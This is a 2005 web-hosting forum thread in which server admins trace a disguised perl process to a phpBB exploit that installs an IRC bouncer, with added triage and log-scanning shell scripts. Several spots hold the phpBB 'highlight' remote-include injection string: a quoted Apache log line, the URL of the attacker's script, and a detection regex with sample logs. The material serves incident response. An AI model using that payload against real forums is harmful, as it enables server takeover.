perl process --> /usr/local/firewall

Discussion in 'General Discussion' started by Def, Nov 8, 2005.

  1. Def

    Def Well-Known Member

    Probably once a day I have a perl process that seems to get hung and causes loads to go up a bit. I do a ps -f <pid> and it shows as /usr/local/firewall . I don't see a firewall file or directory under /usr/local so I'm not sure what's going on with this. I end up killing the pid to get the loads back down and I/O wait back to normal again.

    Is this iptables hanging or some exploit? I've run rkhunter (found nothing) and checked /tmp and /dev/shm for anything out of the ordinary (found nothing). If this is actually my firewall that I'm killing, what is the command to restart it?

    Thanks.
     
  2. DigiCrime

    DigiCrime Well-Known Member

    Sure that's not an anti-DoS module?
     
  3. Def

    Def Well-Known Member

    Not sure. That's why I'm asking ;)
     
  4. acenetryan

    acenetryan Well-Known Member
    PartnerNOC

    I have been seeing this as well.

    I am trying to locate the working directory for this script. If anyone has further insight, it would be appreciated.

    ps aux | grep firewall

    will give you the process ID.

    lsof | grep PID

    This shows the working directory of the process to be "/". I've searched most of the server and have been unable to find anything pertaining to the location of this script and how it gets run.

    I believe the process is an IRC daemon. One of the lines in the lsof shows:

    perl <PID> <USERNAME> 15u IPv4 64850345 TCP <SERVERNAME>:43528-><SOMEDOMAINNAME>:ircd (SYN_SENT)

    I've taken out sensitive information, but note the ircd at the end of the line.

    Anyone know any other way to locate the working directory of a script? This one seems to hide itself well.
     
  5. chirpy

    chirpy Well-Known Member

    It's probably best to use:

    lsof -p PID

    Which will more reliably list the information about the process. You can also look in /proc/PID/* for more details on the process.

    The most important bit of information is the user under which it runs. If it's running under nobody then you most likely have vulnerable PHP scripts in the server (make sure all those phpBB installs are running at least v2.0.18; all others are vulnerable to exploitation).

    Check common directories used by script exploits:

    /tmp
    /var/tmp
    /dev/shm
    /usr/local/apache/proxy/
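    Putting the lsof and /proc advice from the last two posts together, here is an added triage script (not from the thread) that reads /proc/PID directly, which a process cannot rewrite the way it rewrites its own argv. It assumes Linux with /proc mounted, and root for processes owned by other users.

```sh
#!/bin/sh
# Added example (not from the thread): inspect a PID through /proc instead of
# trusting what ps prints. A process can overwrite its own argv (which is how
# perl ends up showing as "/usr/local/firewall"), but it cannot change the
# exe, cwd and fd links the kernel keeps for it. Assumes Linux with /proc
# mounted; reading another user's process needs root.

# proc_triage PID: print the claimed command line next to the kernel's view.
proc_triage() {
    pid="$1"
    if [ ! -d "/proc/$pid" ]; then
        echo "proc_triage: no such pid $pid" >&2
        return 1
    fi
    claimed=$(tr '\0' ' ' < "/proc/$pid/cmdline" | sed 's/ *$//')
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo "?")
    cwd=$(readlink "/proc/$pid/cwd" 2>/dev/null || echo "?")
    uid=$(awk '/^Uid:/ {print $2}' "/proc/$pid/status")
    echo "pid:  $pid (uid $uid)"
    echo "argv: $claimed"
    echo "exe:  $exe"
    echo "cwd:  $cwd"
    # "(deleted)" means the file was unlinked after start; its content is
    # still readable through /proc/PID/exe or /proc/PID/fd/N while it runs.
    case "$exe" in *"(deleted)"*) echo "note: executable unlinked on disk" ;; esac
    if argv_spoofed "$claimed" "$exe"; then
        echo "note: argv does not match the running binary"
    fi
    # Open files: for an interpreter this includes the script being run,
    # and any sockets (an IRC connection shows up here as well as in lsof).
    for fd in "/proc/$pid/fd"/*; do
        target=$(readlink "$fd" 2>/dev/null) || continue
        echo "fd ${fd##*/}: $target"
    done
}

# argv_spoofed CLAIMED EXE: succeed when the program name a process reports
# differs from the binary actually running (a perl interpreter calling itself
# "firewall"). A heuristic only: daemons such as sshd rewrite argv legitimately.
argv_spoofed() {
    claimed_base=${1%% *}; claimed_base=${claimed_base##*/}
    exe_base=${2%" (deleted)"}; exe_base=${exe_base##*/}
    [ -n "$claimed_base" ] && [ "$claimed_base" != "$exe_base" ]
}
```

    Run it as `proc_triage PID` for the PID that ps shows as /usr/local/firewall; the fd list is also where to read the script body from if it has been deleted from disk.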
     
  6. dv2support

    dv2support Member
    PartnerNOC

  7. compunet2

    compunet2 Well-Known Member

    Same here... the source isn't in any of the normal locations (/tmp, /tmp/var, etc.). Any way to find the source file?
     
  8. derekg

    derekg Registered

    It's an exploit

    It's a phpBB exploit. It installs and runs an IRC bouncer on your server. There is no such file as /usr/local/firewall on your server, so don't bother looking for it. Search your Apache logs for entries like this one:

    63.247.81.34 - - [10/Dec/2005:07:38:09 -0500] "GET /forums/viewtopic.php?t=70&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 12718 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t **** Aleks)"

    At http://www.yatas.com/phpbb_private.txt?& you will find the script that does it.

    Now, I have upgraded phpBB to the latest version through WHM, but it didn't help. It didn't help because the upgrade in WHM is broken, as it will not upgrade .php files which belong to phpBB under individual domains. The result of the upgrade is such that, after the upgrade, if you access any of the phpBB bulletins on your server, you will still see the old phpBB version number...

    For me getting rid of phpBB is not an option, because at least 15% of my users have it installed. Just deleting this bug-ridden piece of s..tware would be the best thing to do, but you know how users are...

    To the CPanel programmers: Can you PLEASE fix this so that when we upgrade phpBB installation from WHM, it REALLY upgrades it??? And I mean for ALL THE DOMAINS that are hosted on the server?

    Either that or a script we could run that would take care of all phpBB files under individual domains...
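    An added log-scanning helper (not part of derekg's post) for the request pattern quoted above. The log lines are constructed samples with placeholder addresses and hosts, and the regex is an assumption about what separates the injection from an ordinary search term.

```sh
#!/bin/sh
# Added example (not from the thread): scan an Apache access log for the phpBB
# viewtopic.php "highlight" injection pattern quoted above. The tell-tale is a
# highlight= value carrying a double-encoded quote (%2527) followed by PHP,
# e.g. include( or $poster=; a normal search term never looks like that.
# The log below is constructed sample data; IPs and hosts are placeholders.

# phpbb_highlight_hits LOGFILE: print the matching request lines.
phpbb_highlight_hits() {
    grep -E 'viewtopic\.php\?[^" ]*highlight=%2527[^" ]*(include\(|\$poster=|\$_GET)' "$1"
}

# phpbb_highlight_sources LOGFILE: client IPs of matching requests with hit
# counts, most active first, for checking against the other vhosts' logs.
phpbb_highlight_sources() {
    phpbb_highlight_hits "$1" | awk '{print $1}' | sort | uniq -c | sort -rn
}

sample_log=$(mktemp)
trap 'rm -f "$sample_log"' EXIT
cat > "$sample_log" <<'EOF'
198.51.100.7 - - [10/Dec/2005:07:38:09 -0500] "GET /forums/viewtopic.php?t=70&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://example.invalid/p.txt?& HTTP/1.0" 200 12718 "-" "Mozilla/4.0"
203.0.113.5 - - [10/Dec/2005:08:01:11 -0500] "GET /forums/viewtopic.php?t=12&highlight=firewall HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2005:08:03:27 -0500] "GET /forums/viewtopic.php?t=12&highlight=it%27s HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2005:08:02:45 -0500] "GET /forums/viewtopic.php?t=71&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://example.invalid/p.txt?& HTTP/1.0" 200 12718 "-" "Mozilla/4.0"
EOF

# Usage: the two injection lines are printed, then one summary line for their source.
phpbb_highlight_hits "$sample_log"
phpbb_highlight_sources "$sample_log"
```

    The third sample line (a search for "it's", single-encoded as %27) is there to show the pattern does not fire on legitimate quotes in search terms.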
     